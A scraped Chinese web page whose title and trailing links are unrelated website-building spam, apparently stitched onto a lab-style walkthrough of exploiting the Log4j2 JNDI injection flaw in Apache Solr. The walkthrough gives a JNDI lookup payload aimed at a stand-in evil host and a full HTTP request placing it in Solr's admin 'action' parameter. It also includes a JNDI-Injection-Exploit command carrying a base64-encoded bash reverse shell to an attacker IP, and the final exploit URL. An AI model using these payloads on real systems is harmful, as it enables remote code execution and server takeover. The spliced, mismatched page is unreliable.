当前位置: 首页 > news >正文

建站之星模板制作网页设计专业课程介绍

建站之星模板制作,网页设计专业课程介绍,asp.net实用网站开发doc,wordpress文章排版插件Apache Log4j 2 是Java语言的日志处理套件#xff0c;使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞#xff0c;攻击者在可以控制日志内容的情况下#xff0c;通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入#xff0c;执行任意代码。… Apache Log4j 2 是Java语言的日志处理套件使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞攻击者在可以控制日志内容的情况下通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入执行任意代码。 1.服务启动后访问http://your-ip:8983即可查看到Apache Solr的后台页面。 2.${jndi:dns://${sys:java.version}.example.com}是利用JNDI发送DNS请求的Payload我们将其作为管理员接口的action参数值发送如下数据包 GET /solr/admin/cores?action${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1 Host: your-ip:8983 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Connection: close 3.我们可以在DNS日志平台收到相关日志显示出当前Java版本 4.利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all获得shell java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjY0LjQzLzY2NjYgMD4mMQ}|{base64,-d}|{bash,-i} -A 192.168.64.43 访问下面链接成功反弹 http://192.168.188.128:8983/solr/admin/cores?action${jndi:ldap://192.168.64.43:1389/08zqfe} 参考hrrps://blog.csdn.net/Bossfrank/article/details/130148819
http://www.w-s-a.com/news/73214/

相关文章:

  • 制作网页设计软件列表案例营销网站优化seo
  • 住房和建设建设局网站报告长官夫人在捉鬼
  • 用asp做网站需要什么软件天津建设工程信息网怎么注册
  • 一站式服务图片北京网站优化多少钱
  • 专业的论坛网站建设全网加速器
  • 成都品牌建设网站公司表单制作小程序
  • 手机端 网站 模板网页广告关不掉怎么办
  • 软装公司网站建设有没有做任务的网站
  • 加盟招商网站建设工业设计网站 知乎
  • 怎么做淘宝客网站优化免费windows7云主机
  • 有什么网站可以推广信息沈阳网站建设思路
  • 网站建设可研域名解析在线工具
  • 鲜花销售网站模板wordpress+模版+推荐
  • 企业网站报价网站域名 没有续费
  • 机关门户网站建设管理情况邮箱登陆嵌入网站
  • 创建网站超市网站建设后还有什么费用
  • 徐州泉山区建设局网站企业网站注册官网
  • 西青网站建设暴雪回归
  • 如何生成网站建设局建筑电工证查询网站
  • 网站改版建设原则网站网站建设公司上海
  • 网站推广见效快的方法深圳高端网站建设网页设计
  • 建设银行官网首页网站购纪念币接做网站需要问什么条件
  • 网站的ftp地址是什么江苏做网站
  • 宁波网站建设制作公司哪家好潍坊建公司网站
  • 云端网站建设php7 wordpress速度
  • 建站的公司中小企业网站建设报告
  • 上海高档网站建设网站设计入门
  • 德尔普网站建设做网站线
  • 宁波网站搭建定制非模板网站建设电子商务公司名称大全简单大气
  • 巴中哪里做网站推销网站的方法